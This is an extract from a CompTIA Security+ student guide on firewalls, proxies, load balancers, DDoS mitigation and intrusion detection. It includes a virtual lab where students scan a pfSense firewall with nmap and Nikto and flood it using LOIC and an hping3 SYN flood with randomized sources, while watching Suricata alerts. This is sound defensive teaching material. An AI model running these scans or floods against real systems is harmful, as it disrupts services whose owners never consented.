security professional, a very large part of your workday will be taken up with
implementing, configuring, and troubleshooting firewalls, proxies, and content filters.
FIREWALLS
Firewalls are the devices principally used to implement security zones, such as
intranet, demilitarized zone (DMZ), and the Internet. The basic function of a firewall is
traffic filtering. A firewall resembles a quality inspector on a production line; any bad
units are knocked off the line and go no farther. The firewall processes traffic
according to rules; traffic that does not conform to a rule that allows it access is
blocked.
There are many types of firewalls and many ways of implementing a firewall. One
distinction can be made between firewalls that protect a whole network (placed inline
in the network and inspecting all traffic that passes through) and firewalls that protect
a single host only (installed on the host and only inspect traffic destined for that host).
Another distinction can be made between border firewalls and internal firewalls.
Border firewalls filter traffic between the trusted local network and untrusted external
networks, such as the Internet. DMZ configurations are established by border firewalls.
Internal firewalls can be placed anywhere within the network, either inline or as host
firewalls, to filter traffic flows between different security zones. A further distinction
can be made about what parts of a packet a particular firewall technology can inspect
and operate on.
Note: Many border firewalls implement NAT or NAPT. NAT conceals information about
the private network behind the firewall.
inspect the headers of IP packets. This means that rules can be based on the
information found in those headers:
• IP filtering—accepting or denying traffic on the basis of its source and/or
destination IP address.
• Protocol ID/type (TCP, UDP, ICMP, routing protocols, and so on).
• Port filtering/security—accepting or denying a packet on the basis of source and
destination port numbers (TCP or UDP application type).
There may be additional functionality in some products, such as the ability to block
some types of ICMP (ping) traffic but not others, or the ability to filter by hardware
(MAC) address. Packet filtering is a stateless technique because the firewall examines
each packet in isolation and has no record of previous packets.
Another distinction that can be made is whether the firewall can control only inbound
traffic or both inbound and outbound traffic. This is also often referred to as ingress
and egress traffic or filtering. Controlling outbound traffic is useful because it can block
applications that have not been authorized to run on the network and defeat malware,
such as backdoors. Ingress and egress traffic is filtered using separate ACLs.
A packet filtering firewall is stateless. This means that it does not preserve information
about the connection between two hosts. Each packet is analyzed independently, with
no record of previously processed packets. This type of filtering requires the least
processing effort, but it can be vulnerable to attacks that are spread over a sequence
of packets. A stateless firewall can also introduce problems in traffic flow, especially
when some sort of load balancing is being used or when clients or servers need to use
dynamically assigned ports.
State table in the pfSense firewall appliance. (Screenshot used with permission from Rubicon
Communications, LLC.)
pfSense firewall rule configuration—Advanced settings allow maximums for states and connections to
be applied. (Screenshot used with permission from pfsense.org.)
NETWORK-BASED FIREWALLS
You should also consider how the firewall is implemented (as hardware or software,
for instance) to cover a given placement or use on the network. Some types of firewalls
are better suited for placement at network or segment borders; others are designed to
protect individual hosts.
An appliance firewall is a stand-alone hardware firewall that performs the function of
a firewall only. The functions of the firewall are implemented on the appliance
firmware. This is also a type of network-based firewall and monitors all traffic passing
into and out of a network segment. This type of appliance could be implemented with
routed interfaces or as a layer 2/virtual wire transparent firewall. Nowadays, the role of
advanced firewall is likely to be performed by an all-in-one or unified threat
management (UTM) security appliance, combining the function of firewall, intrusion
detection, malware inspection, and web security gateway (content inspection and URL
filtering).
Cisco ASA (Adaptive Security Appliance) ASDM (Adaptive Security Device Manager) interface.
(Screenshot used with permission from Cisco.)
A router firewall is similar, except that the functionality is built into the router
firmware. Most SOHO Internet router/modems have this type of firewall
functionality. An enterprise-class router firewall would be able to support far more
sessions than a SOHO one. Additionally, some layer 3 switches can perform packet
filtering.
APPLICATION-BASED FIREWALLS
Firewalls can also run as software on any type of computing host. There are several
types of application-based firewalls:
• Host-based firewall (or personal firewall)—implemented as a software
application running on a single host designed to protect that host only.
HOST-BASED FIREWALLS
While they can perform basic packet filtering, host-based firewalls tend to be program-
or process-based; that is, when a program tries to initiate (in the case of outbound) or
accept (inbound) a TCP/IP network connection, the firewall prompts the user to block,
allow once, or allow always. Advanced configuration options allow the user to do things
such as specify ports or IP scopes for particular programs (to allow access to a local
network but not the Internet, for instance), block port scans, and so on.
Unlike a network firewall, a host-based firewall will usually display an alert to the user
when a program is blocked, allowing the user to override the block rule or add an
accept rule (if the user has sufficient permissions to reconfigure firewall settings).
Blocked traffic alert issued by Windows Firewall. (Screenshot used with permission from Microsoft.)
Note: When you are using a personal firewall on an enterprise network, some thought
needs to be given as to how it will interact with network border firewalls. The use of
personal firewalls can make troubleshooting network applications more complex.
With the ModSecurity WAF installed to this IIS server, a scanning attempt has been detected and logged
as an Application event—As you can see, the default ruleset generates a lot of events. (Screenshot used
with permission from Microsoft.)
secure websites on the Internet. In this case, you have deployed a proxy server that
services TCP ports 80 and 443 for outbound traffic. This type of device is placed at the
network edge, usually in some sort of DMZ. Web proxies are often also described as
web security gateways as usually their primary functions are to prevent viruses or
Trojans infecting computers from the Internet, block spam, and restrict web use to
authorized sites, acting as a content filter.
Configuring content filter settings for the Squid proxy server (squid-cache.org) running on pfSense. The
filter can apply ACLs and time-based restrictions, and use blacklists to prohibit access to URLs.
(Screenshot used with permission from Rubicon Communications, LLC.)
The main benefit of a proxy server is that client computers connect to a specified point
within the perimeter network for web access. This provides for a degree of traffic
management and security. In addition, most web proxy servers provide caching
engines, whereby frequently requested web pages are retained on the proxy, negating
the need to re-fetch those pages for subsequent requests. Some proxy servers also
pre-fetch pages that are referenced in pages that have been requested. When the
client computer then requests that page, the proxy server already has a local copy.
A proxy server must understand the application it is servicing. For example, a web
proxy must be able to parse and modify HTTP and HTTPS commands (and potentially
HTML too). Some proxy servers are application-specific; others are multipurpose. A
multipurpose proxy is one configured with filters for multiple protocol types, such as
HTTP, FTP, and SMTP.
Proxy servers can generally be classed as non-transparent or transparent.
• A non-transparent server means that the client must be configured with the proxy
server address and port number to use it. The port on which the proxy server
accepts client connections is often configured as port 8080.
• A transparent (or forced or intercepting) proxy intercepts client traffic without the
client having to be reconfigured. A transparent proxy must be implemented on a
switch or router or other inline network appliance.
Configuring transparent proxy settings for the Squid proxy server (squid-cache.org) running on
pfSense. (Screenshot used with permission from Rubicon Communications, LLC.)
FIREWALL CONFIGURATION
A firewall, proxy, or content filter is an example of rule-based management. Firewall
and other filtering rules are configured on the principle of least access. This is the
same as the principle of least privilege; only allow the minimum amount of traffic
required for the operation of valid network services and no more. The rules in a
firewall's ACL are processed top-to-bottom. If traffic matches one of the rules, then it is
allowed to pass; consequently, the most specific rules are placed at the top. The final
default rule is typically to block any traffic that has not matched a rule (implicit deny).
Sample firewall ruleset configured on pfSense. This ruleset blocks all traffic from bogon networks and
a specific private address range but allows any HTTP, HTTPS, or SMTP traffic from any other source.
(Screenshot used with permission from Rubicon Communications, LLC.)
Each rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database, the
tuples are the columns. For example, in the previous screenshot, the tuples include
Protocol, Source (address), (Source) Port, Destination (address), (Destination) Port, and
so on.
Even the simplest packet filtering firewall can be complex to configure securely. It is
essential to create a written policy describing what a filter ruleset should do and to test
the configuration as far as possible to ensure that the ACLs you have set up work as
intended. Also test and document changes made to ACLs. Some other basic principles
include:
• Block incoming requests from internal or private IP addresses (that have obviously
been spoofed).
• Block incoming requests from protocols that should only be functioning at a local
network level, such as ICMP, DHCP, or routing protocol traffic.
• Use penetration testing to confirm the configuration is secure. Log access attempts
and monitor the logs for suspicious activity.
• Take the usual steps to secure the hardware on which the firewall is running and
use of the management interface.
firewall's log files to discover what rules have been applied to block traffic at a
particular time.
The other possible outcome of a badly configured firewall is that packets may be
allowed through that should be blocked. This is a more serious outcome because the
result is to open the system to security vulnerabilities. It is also not necessarily so easily
detected, as it does not typically cause anything to stop functioning. As no incidents
usually arise from this outcome (except in the case that a vulnerability is exploited), it is
not a scenario that is subject to troubleshooting. Rather, it underlines the need for
regular firewall and content filter audits and thorough change control processes to
deal with firewall change requests.
Activity 9-1
Discussing Firewalls and Proxies
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic:
1. True or False? As they protect data at the highest layer of the protocol stack,
application-based firewalls have no basic packet filtering functionality.
False. All firewall types can perform basic packet filtering (by IP address,
protocol type, port number, and so on).
3. What is a WAF?
True.
Topic B
Install and Configure Load Balancers
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
1.6 Explain the impact associated with types of vulnerabilities.
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
3.2 Given a scenario, implement secure network architecture concepts.
A Denial of Service (DoS) attack is one of a network manager's worst fears. These
attacks can be extremely destructive and very difficult to mitigate. As a network
security professional, it is vital for you to be able to compare and contrast DoS and
DDoS methods and to be able to recommend and configure load balancing
technologies that can make networks more resilient to these attacks.
Many DoS attacks attempt to deny bandwidth to web servers connected to the
Internet. They focus on exploiting historical vulnerabilities in the TCP/IP protocol suite.
TCP/IP was never designed for security; it assumes that all hosts and networks are
trusted. Other application attacks do not need to be based on consuming bandwidth
or resources. Attacks can target known vulnerabilities in software to cause them to
crash; worms and viruses can render systems unusable or choke network bandwidth.
All these types of DoS attack can have severe impacts on service availability, with a
consequent effect on the productivity and profitability of a company. Where a DoS
attack disrupts customer-facing services, there could be severe impacts on the
company's reputation. An organization could also be presented with threats of
blackmail or extortion.
then use the backdoor application to install DoS software and trigger the zombies to
launch the attack at the same time.
Note: Any type of Internet-enabled device is vulnerable to compromise. This includes
web-enabled cameras, SOHO routers, and smart TVs and other appliances. This is
referred to as an Internet of Things (IoT) botnet.
DDoS MITIGATOR
DDoS attacks can be diagnosed by analyzing network traffic but can usually only be
counteracted by providing high availability services; for example, by using cluster
services. In some cases, an intelligent firewall can detect a DoS attack that is under way
and automatically block the source. However, for many of the techniques used in DDoS
attacks, the source addresses will be randomly spoofed, making it difficult to detect the
source of the attack.
Dropping traffic from blacklisted IP ranges using Security Onion IDS. (Screenshot used with permission
from Security Onion.)
When a network is faced with a DDoS or similar flooding attack, an ISP can use either
an ACL or a blackhole to drop packets for the affected IP address(es). A blackhole is an
area of the network that cannot reach any other part of the network. The blackhole
option is preferred, as evaluating each packet in a multi-gigabit stream against ACLs
overwhelms the processing resources available. The blackhole also makes the attack
less damaging to the ISP's other customers. With both approaches, legitimate traffic is
discarded along with the DDoS packets.
Another option is to use sinkhole routing so that the traffic flooding a particular IP
address is routed to a different network where it can be analyzed. Potentially, some
legitimate traffic could be allowed through, but the real advantage is to identify the
source of the attack and devise rules to filter it. The target can then use low TTL DNS
records to change the IP address advertised for the service and try to allow legitimate
traffic past the flood.
Note: There are cloud DDoS mitigation services that can act as sinkhole network
providers and try to "scrub" flooded traffic.
LOAD BALANCERS
A load balancer distributes client requests across available server nodes in a farm or
pool. Clients use the single name/IP address of the load balancer to connect to the
servers in the farm. This provides for higher throughput or supports more connected
users. A load balancer provides fault tolerance. If there are multiple servers available in
a farm, all addressed by a single name/IP address via a load balancer, then if a single
server fails, client requests can be routed to another server in the farm. You can use a
load balancer in any situation where you have multiple servers providing the same
function. Examples include web servers, front-end email servers, and web
conferencing, A/V conferencing, or streaming media servers.
There are two main types of load balancers:
• Layer 4 load balancer—early instances of load balancers would base forwarding
decisions on IP address and TCP/UDP port values (working at up to layer 4 in the
OSI model). This type of load balancer is stateless; it cannot retain any information
about user sessions.
• Layer 7 load balancer (content switch)—as web applications have become more
complex, modern load balancers need to be able to make forwarding decisions
based on application-level data, such as a request for a particular URL or data types
like video or audio streaming. This requires more complex logic, but the processing
power of modern appliances is sufficient to deal with this.
Most load balancers need to be able to provide some or all of the following features:
• Configurable load—the ability to assign a specific server in the farm for certain
types of traffic or a configurable proportion of the traffic.
• TCP offload—the ability to group HTTP packets from a single client into a collection
of packets assigned to a specific server.
• SSL offload—when you implement SSL/TLS to provide for secure connections, this
imposes a load on the web server (or other server). If the load balancer can handle
the processing of authentication and encryption/decryption, this reduces the load
on the servers in the farm.
• Caching—as some information on the web servers may remain static, it is desirable
for the load balancer to provide a caching mechanism to reduce load on those
servers.
• Prioritization—to filter and manage traffic based on its priority.
In terms of security, deploying a load balancer provides better fault tolerance and
redundancy. The service will be more resilient to DoS attacks.
VIRTUAL IP
Each server node or instance needs its own IP address, but externally a load-balanced
service is advertised using a Virtual IP (VIP) address (or addresses). There are
different protocols available to handle virtual IP addresses and they differ in the ways
that the VIP responds to ARP and ICMP, and in compatibility with services such as NAT
and DNS. One of the most widely used protocols is the Common Address
Redundancy Protocol (CARP). There is also Cisco's proprietary Gateway Load
Balancing Protocol (GLBP).
SCHEDULING
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling is
called round robin; this just means picking the next node. Other methods include
picking the node with fewest connections or best response time. Each method can also
be weighted, using administrator set preferences or dynamic load information or
both.
The load balancer must also use some type of heartbeat or health check probe to
verify whether each node is available and under load or not. Layer 4 load balancers can
only make basic connectivity tests while layer 7 appliances can test the application's
state, as opposed to only verifying host availability.
CLUSTER SERVICES
Apart from the affinity and cookie persistence methods discussed earlier, load
balancing can only provide for stateless fault tolerance, as by itself it cannot provide a
mechanism for transferring the state of data. If you need fault tolerance of stateful
data, you must implement a clustering technology, whereby the data residing on one
node (or pool) is made available to another node (or pool) seamlessly and
transparently in the event of a node failure. This allows servers in the cluster to
communicate session information to one another so, for example, if a user logs in on
one instance, the next session can start on another instance and the new server can
access the cookies or other information used to establish the login.
Where load balancing provides front-end distribution of client requests, clustering is
used to provide fault tolerance for back-end applications. For example, if you wanted
to provide a resilient online purchasing system based around SQL Server, you might
install a clustering solution to support the actual SQL databases.
There are essentially two types of clustering: Active/Active and Active/Passive.
Some applications and services will not function in a clustered environment and some
sub-components of cluster-aware applications cannot run on a cluster. You will need to
be aware of these restrictions when planning the cluster implementation.
Activity 9-2
Discussing Load Balancers
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Most attacks depend on overwhelming the victim. This typically requires a large
number of hosts.
The algorithm and metrics that determine which node a load balancer picks to
handle a request.
5. You are implementing a new e-commerce portal with multiple web servers
accessing accounts on database servers. Would you deploy load balancers to
facilitate access by clients to the web servers or by the web servers to the
database servers? Why or why not?
Load balancers are typically deployed for stateless fault tolerance and so would
be used at the front-end (client-web server) rather than back-end (database
servers). Load balancing a database service would be performed by configuring
server clusters.
Activity 9-3
Installing and Configuring a Firewall
SCENARIO
This activity will demonstrate some of the installation and configuration issues you
might face in deploying a typical security appliance to screen a local network from the
Internet. You will be using pfSense, an open source UTM created and maintained by
Netgate (https://pfsense.org).
The following figure shows the network layout. The top three devices are routers
(implemented by the VyOS VMs), while the pipes represent different subnets, each
underpinned by a virtual switch (configured via Hyper-V). The RT3-INT and RT2-ISP
routers and the subnets they support represent an "Internet". The LAN subnet has the
Windows VMs plus one Linux server (LX1) attached to it. The pfSense firewall is
positioned so that it routes and screens all traffic passing between the LAN network
and the ISP network. The "Internet" contains two separate subnets, one hosting a
LAMP Linux web server and the other with the KALI Linux penetration testing VM in it.
Network topology with pfSense VM protecting the LAN switch. (Image © 123RF.com.)
This activity is designed to test your understanding of and ability to apply content
examples in the following CompTIA Security+ objectives:
• 1.2 Compare and contrast types of attacks.
• 1.6 Explain the impact associated with types of vulnerabilities.
• 2.1 Install and configure network components, both hardware- and software-based,
to support organizational security.
• 2.3 Given a scenario, troubleshoot common security issues.
• 2.4 Given a scenario, analyze and interpret output from security technologies.
• 3.2 Given a scenario, implement secure network architecture concepts.
The pfSense web dashboard. (Screenshot used with permission from Rubicon
Communications, LLC.)
Note the IP addresses assigned to the LAN and WAN interfaces. Make sure you can
locate these addresses in the topology diagram presented earlier.
e) Select Diagnostics→Routes.
The default gateway is the IP address of the RT2-ISP VM.
Showing the routing table. (Screenshot used with permission from Rubicon
Communications, LLC.)
You can use the My Traceroute (mtr) tool to verify paths to remote hosts.
mtr trace—The packet is sent out to the default gateway (172.16.0.253 on RT2-ISP), which
is able to discover a route to the host 192.168.1.1 via 172.16.1.254 (RT3-INT). (Screenshot
used with permission from Rubicon Communications, LLC.)
h) View some of the information available in the Status menu.
• Interfaces—shows packet I/O and number of blocked and allowed packets.
• Monitoring—shows CPU load by process.
• Traffic graph—shows bandwidth used on the WAN or LAN interfaces.
i) Select Status→System Logs.
The most important logs are:
• System—events affecting the operation of the appliance.
• Firewall—events triggered by processing firewall rules.
The logs are stored in memory only but can be transferred to a syslog server.
j) Select the Settings tab.
k) Check the Log packets matched from the default pass rules in the ruleset check
box.
l) Under Remote Logging Options, check the Enable Remote Logging check box.
Scroll down to view the remote logging options, but do not change any settings.
This is an example of how you might configure remote logging settings.
Configuring remote logging to a syslog server. (Screenshot used with permission from
Rubicon Communications, LLC.)
m) Uncheck the Enable Remote Logging check box.
n) Select Save.
o) Select Diagnostics→States, and then select Diagnostics→States Summary.
These options show how many client connections the firewall is servicing.
2. Configure the firewall to forward external requests for the web service to the
10.1.0.10 host on the LAN.
a) Select Firewall→NAT. On the Port Forward tab, select the Add button (either will
do).
b) In the Destination section, select WAN address.
c) In the Destination port range section, select HTTP.
d) In the Redirect target IP section, type 10.1.0.10
e) In the Redirect target port section, select HTTP.
f) In the Description section, type Web server access
g) Select the Save button, then confirm by selecting Apply Changes.
3. Test the connection by browsing the web service on the LAN network from the
KALI VM.
You will need to update the DNS records on LAMP to point to the new external IP address
for the 515support.com website.
a) Open a LAMP VM console window. Sign in as lamp with the password Pa$$w0rd
Unlike in Windows, the username is case-sensitive.
Note: You can type the username even if the prompt is not shown.
b) Run the following two commands, ignoring any line breaks in the mv command, and
enter the password Pa$$w0rd when you are prompted:
d) Select the Firefox ESR icon in the application tray to start Firefox.
e) Verify that you can browse to www.515support.com from the KALI VM.
You should see the Apache test page. This is not a great choice of web service to be
running on a LAN, but you have established that the port forwarding rule works.
Browsing the firewall log. At the top, you can see logs allowing the PC1 VM access via HTTP
(using the management interface) and DNS traffic from RT3-INT (192.168.1.254). At the
bottom, you can see the connection attempts on port 80 by KALI (192.168.2.192) being
blocked. (Screenshot used with permission from Rubicon Communications, LLC.)
e) Select the Interfaces tab again, then select the Play button to start Suricata.
Starting the Suricata IDS service. (Screenshot used with permission from Rubicon
Communications, LLC.)
f) Select the Global Settings tab.
This is used to configure which rulesets are used (some require subscriber access).
g) Select the Alerts tab.
This is in preparation for the next step.
6. You will be using the KALI VM to test the IDS and the PC1 VM to monitor the
effects. Try to arrange the connection windows so that you can view both at the
same time.
a) In the KALI VM, in the application bar, select the icon to launch Zenmap.
b) In the Target box, type 172.16.0.254 and then select the Scan button.
The host is not scanned. This is because pfSense blocks pings so Nmap needs to be
forced to initiate a port scan on that IP address.
c) In the Command box, adjust the string to add the -Pn switch, and then select the
Scan button again:
nmap -T4 -A -v -Pn 172.16.0.254
d) Analyze the Nmap results.
Some information has been gained (the web server version has been identified, but
OS detection has not returned reliable results), but there is not much for a
prospective attacker to go on.
e) On PC1, analyze the Alerts tab (you might want to filter by source IP address
192.168.2.192). Verify that only a few ICMP packets are recorded.
f) Select the Blocks tab. The KALI VM was blocked when the ICMP traffic was detected.
Select the Clear button, and then confirm by selecting OK.
g) Reconfigure Suricata on the WAN interface so as not to block hosts automatically.
Select the Interfaces tab and then select the Edit icon.
h) Under Alert and Block Settings, uncheck the Block Offenders check box. Select the
Save button.
i) Select the Interfaces tab again, then select the Restart icon to apply the new
configuration.
Reconfiguring Suricata so that the Block option is disabled. (Screenshot used with
permission from Rubicon Communications, LLC.)
j) On the KALI VM, re-run the Nmap scan—is it able to gather any more information
without the block?
This time, the scan can retrieve and analyze the HTTP headers returned by the web
server.
k) Close the Zenmap window.
l) On the KALI VM, open a terminal and run the following command to initiate a web
vulnerability scan using Nikto (https://cirt.net/Nikto2):
nikto -host 172.16.0.254
m) Look at the results on the Alerts tab on the PC1 VM (apply a filter to show only source
IP 192.168.2.192).
The IDS has identified some invalid uses of HTTP, but has not identified the Nikto
scanner specifically. It is likely that the subscriber ruleset would provide more
definitive matches.
n) On the KALI VM, close the terminal window.
You do not need to respond to the prompt about submitting responses.
a) On the KALI VM, open the file browser , then right-click the LOIC.exe file in the
Home folder and select Open with MonoRuntime.
LOIC will display offensive messages if you do not follow these instructions carefully.
If you are worried about being offended, please skip this portion of the activity.
b) In the IP box, type 172.16.0.254 and then select the Lock on button.
c) In Section 3. Attack options, from the Method box, select TCP. Select the IMMA
CHARGIN MAH LAZER button.
d) Switch to the pfSense WebConfigurator on PC1. Has Suricata logged any activity?
The WebConfigurator should remain responsive. You will see the Suricata IDS
generate alerts about invalid ACKs.
e) Look at Status→Monitoring and Status→Traffic Graph to view the effect on CPU
and bandwidth utilization. View Diagnostics→ States to observe the States table
(information about current connections).
There's a reason they're called distributed DoS attacks. If you allocated more
resources to the KALI VM than the PFSENSE VM (more processors, for instance), you
could probably overwhelm the firewall, but really, to overwhelm a website, the
attacker needs to launch the attack using a bot army.
f) Back in KALI, select the Stop flooding button, and close LOIC.
g) If necessary, open a terminal window. Run the following command (ignore the line
break):
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source
172.16.0.254
Rather than just bombarding the target with packets, hping (http://www.hping.org)
launches a SYN flood DoS attack (the -S switch sets the SYN flag in the packet). This
type of attack is designed to eat up space in the states table, preventing other
sessions from being established.
h) On the PC1 VM, monitor the Alerts and Dashboard pages of the WebConfigurator.
As the states table gets close to being filled, you will find the application becomes
unresponsive and you receive This page can't be displayed errors.
i) On the KALI VM, use Ctrl+C to stop the attack.
j) Switch to the pfSense WebConfigurator on PC1 (it should start responding again
shortly after stopping the attack). Has Suricata logged any activity? What is listed
under Diagnostics→States?
The states table shows numerous SYN Sent/Established connections to random
source IP addresses.
Topic C
Install and Configure Intrusion
Detection/Prevention Systems
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.4 Given a scenario, analyze and interpret output from security technologies HIDS/HIPS.
3.2 Given a scenario, implement secure network architecture concepts.
Intrusion detection and prevention systems are mature security technologies, widely
deployed to protect company networks. A large part of the monitoring and alerting
data you will be analyzing will come from these systems so it is important that you be
able to install them to appropriate locations in the network and configure them
correctly.
Snort open source IDS running on Windows Server. (Screenshot used with permission from snort.org.)
• Passive test access point (TAP)—this is a box with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the signal
from the cabling to a monitor port. There are types for copper and fiber optic
cabling. Unlike a SPAN, no logic decisions are made so the monitor port receives
every frame—corrupt or malformed or not—and the copying is unaffected by load.
• Active TAP—this is a powered device that performs signal regeneration (again, there
are copper and fiber variants), which may be necessary in some circumstances.
Gigabit signaling over copper wire is too complex for a passive tap to monitor and
some types of fiber links may be adversely affected by optical splitting. Because it
performs an active function, the TAP becomes a point of failure for the links in the
event of power loss. When deploying an active TAP, it is important to use a model
with internal batteries or connect it to a UPS.
A TAP will usually output two streams to monitor a full-duplex link (one channel for
upstream and one for downstream). Alternatively, there are aggregation TAPs, which
rebuild the streams into a single channel, but these can drop frames under very heavy
load.
Note: As well as preventing malicious content from coming in, some security appliances
can prevent confidential data from going out. These can be used to implement Data Loss
Prevention (DLP). Security devices that bundle multiple functions, such as firewall, IPS,
anti-malware, DLP, and secure VPN, are referred to as Unified Threat Management (UTM)
appliances.
The Symantec Endpoint Protection client application provides malware and intrusion prevention
security. (Screenshot used with permission from Symantec.)
Installing HIDS/HIPS is simply a case of choosing which hosts to protect, then installing
and configuring the software. There will also normally be a reporting and management
server to control the agent software on the hosts.
Note: Ideally, an IDS host has two network interfaces: one to connect to the normal
network, and the other is a management interface to connect to a separate network
containing the management server. This could be implemented as a physically separate
network infrastructure or as a VLAN.
A Host-based Intrusion Prevention System (HIPS) with active response can act to
preserve the system in its intended state. This means that the software can prevent
system files from being modified or deleted, prevent services from being stopped, log
off unauthorized users, and filter network traffic.
Exploit mitigation settings for Symantec Endpoint Protection suite host firewall/IPS. (Screenshot used
with permission from Symantec.)
The main advantage of HIDS/HIPS is that they can be much more application specific
than NIDS. For example, HIDS/HIPS can analyze encrypted traffic (once it has been
decrypted on the host) and it is easier to train the system to recognize normal traffic.
The main disadvantages of HIDS/HIPS are:
• The software is installed on the host and, therefore, detectable. This means that it is
vulnerable to attack by malware.
• The software also consumes CPU, memory, and disk resources on the host.
HIDS/HIPS software produces similar output to an anti-malware scanner. If the
software detects a threat, it may just log the event or display an alert. The log should
show you which process initiated the event and what resources on the host were
affected. You can use the log to investigate whether the suspect process is authorized
or should be removed from the host.
SIGNATURE-BASED DETECTION
In both network and host intrusion detection, the analysis engine is the component
that scans and interprets the traffic captured by the sensor or agent with the purpose
of identifying suspicious traffic. The analysis engine determines whether any given
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 9: Installing and Configuring Security Appliances | Topic C
374 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
event should be classed as an incident (or violation of the security policy or standard).
The analysis engine is programmed with a set of rules that it uses to drive its decision-
making process. There are several methods of formulating the ruleset.
Signature-based detection (or pattern-matching) means that the engine is loaded
with a database of attack patterns or signatures. If traffic matches a pattern, then the
engine generates an incident.
Identifying a malware file signature with Symantec Endpoint Protection. (Screenshot used with
permission from Symantec.)
The signatures and rules (often called plug-ins or feeds) powering intrusion detection
need to be updated regularly to provide protection against the latest threat types.
Commercial software requires a paid-for subscription to obtain the updates. It is
important to ensure that the software is configured to update only from valid
repositories, ideally using a secure connection method, such as HTTPS.
Blocking an attempted port scan in Symantec Endpoint Protection security suite. (Screenshot used with
permission from Symantec.)
The engine does not keep a record of everything that has happened and then try to
match new traffic to a precise record of what has gone before. It uses heuristics
(meaning to learn from experience) to generate a statistical model of what the baseline
looks like. It may develop several profiles to model network use at different times of
the day. This means that the system generates false positive and false negatives until it
has had time to improve its statistical model of what is "normal."
Often behavioral- and anomaly-based detection are taken to mean the same thing (in
the sense that the engine detects anomalous behavior). Anomaly-based detection
can also be taken to mean specifically looking for irregularities in the use of protocols.
For example, the engine may check packet headers or the exchange of packets in a
session against RFC standards and generate an alert if they deviate from strict RFC
compliance.
Heuristics-based host threat protection in Symantec Endpoint Protection suite. (Screenshot used with
permission from Symantec.)
generate more false positives. Behavior-based detection also requires more processing
resources.
Some IDS support dynamic profiles, which automatically adjust over time to match
typical network behavior. These can be vulnerable to low-level attacks, during which
only a small amount of malicious traffic is generated at any one time. Another
vulnerability is for an administrator to allow malicious traffic through during the
training period by mistake.
As well as tuning the ruleset, also check that an IDS sensor is positioned in such a way
that it can see traffic from all intended network segments.
ANTI-VIRUS SCANNERS
When dealing with malware and suspect processes generally, you might respond to a
report or alert from an anti-virus scanner or intrusion detection system or you might
need to use advanced malware tools to investigate a host demonstrating suspicious
activity.
An on-access anti-virus scanner or intrusion prevention system works by identifying
when processes or scripts are executed and intercepting (or hooking) the call to scan
the code first. If the code matches a signature of known malware or exhibits malware-
like behavior that matches a heuristic profile, the scanner will prevent execution and
attempt to take the configured action on the host file (clean, quarantine, erase, and so
on). An alert will be displayed to the user and the action will be logged (and also may
generate an administrative alert). The malware will normally be tagged using a vendor
proprietary string and possibly by a CME (Common Malware Enumeration) identifier.
These identifiers can be used to research the symptoms of and methods used by the
malware. This may help to confirm the system is fully remediated and to identify
whether other systems have been infected. It is also important to trace the source of
the infection and ensure that it is blocked to prevent repeat attacks and outbreaks.
Detecting and remediating a virus infection using Symantec Endpoint Protection. (Screenshot used with
permission from Symantec.)
usually include a single console from which you can monitor and manage various
defense settings. UTM was created in response to several difficulties that
administrators face in deploying discrete security systems; namely, managing several
complex platforms as well as meeting the significant cost requirements. UTM systems
help to simplify the security process by being tied to only one vendor and requiring
only a single, streamlined application to function. This makes management of your
organization's network security easier, as you no longer need to be familiar with or
know the quirks of each individual security implementation. Nevertheless, UTM has its
downsides. When defense is unified under a single system, this creates the potential
for a single point of failure that could affect an entire network. Distinct security
systems, if they fail, might only compromise that particular avenue of attack.
Additionally, UTM systems can struggle with latency issues if they are subject to too
much network activity.
When installing software from other sources, a file integrity check can be performed
manually using tools such as the following:
• certutil -hashfile File Algorithm—this is a built-in Windows
command, where File is the input and Algorithm is one of MD5, SHA1,
SHA256, or SHA512. You have to compare the value obtained to the published
fingerprint manually (or by using a shell script).
• File Checksum Integrity Verifier (fciv)—this is a downloadable Windows utility
that can be used as an alternative to certutil. You can use the -v switch to
compare the target with the value stored in a file, add thumbprints to an XML
database, and check to see if the hash of a target file matches one stored in the
database.
• md5sum | sha1sum | sha256sum | sha512sum—Linux tools to calculate
the fingerprint of a file supplied as the argument. You can also use the -c switch to
compare the input file with a source file containing the pre-computed hash.
• gpg—if a Linux source file has been signed, you need to use the publisher's public
key and the gpg utility to verify the signature.
There is also the case that files already installed could have been compromised. File
integrity monitoring (FIM) software audits key system files to make sure they match
the authorized versions. In Windows, the Windows File Protection service runs
automatically and the System File Checker (sfc) tool can be used manually to verify OS
system files. Tripwire® (https://www.tripwire.com) and OSSEC (http://
www.ossec.net) are examples of multi-platform tools with options to protect a wider
range of applications. FIM functionality is built into HIDS/HIPS suites too.
as these, but the AV scanner or UTM appliance does not report an infection, you will
need to analyze the host for malware using advanced tools.
Note: Because on-access scanning depends on OS function calls, which could be
compromised by the malware, also run anti-virus scans against the target file system
from a network or standalone scanner rather than from "within" the potentially infected
system.
Caution: Set up a sandboxed lab environment to perform analysis. Do not allow file
transfer or network traffic between the sandbox and the production network. Do not
allow the use of laptops or PCs on both networks. Wipe machines used for analysis back
to a baseline configuration regularly. You can also inspect suspicious files by uploading
them to a scanning service such as https://malwr.com or https://www.virustotal.com.
These sites execute the malware in a sandbox and observe how it interacts with the file
system and attempts to contact IP addresses or domains.
There is a plethora of advanced analysis and detection utilities, but the starting point
for most technicians is Sysinternals (https://docs.microsoft.com/sysinternals).
Sysinternals is a suite of tools designed to assist with troubleshooting issues with
Windows.
When hunting for a malicious process using a tool such as Process Explorer (part of
Sysinternals), you need to be able to filter out the legitimate activity generated by
normal operation of the computer and look for the signs that could identify a process
as suspicious. APT-type malware is typically introduced by a dropper application. To
infect the system, the malware author must be able to run the dropper with
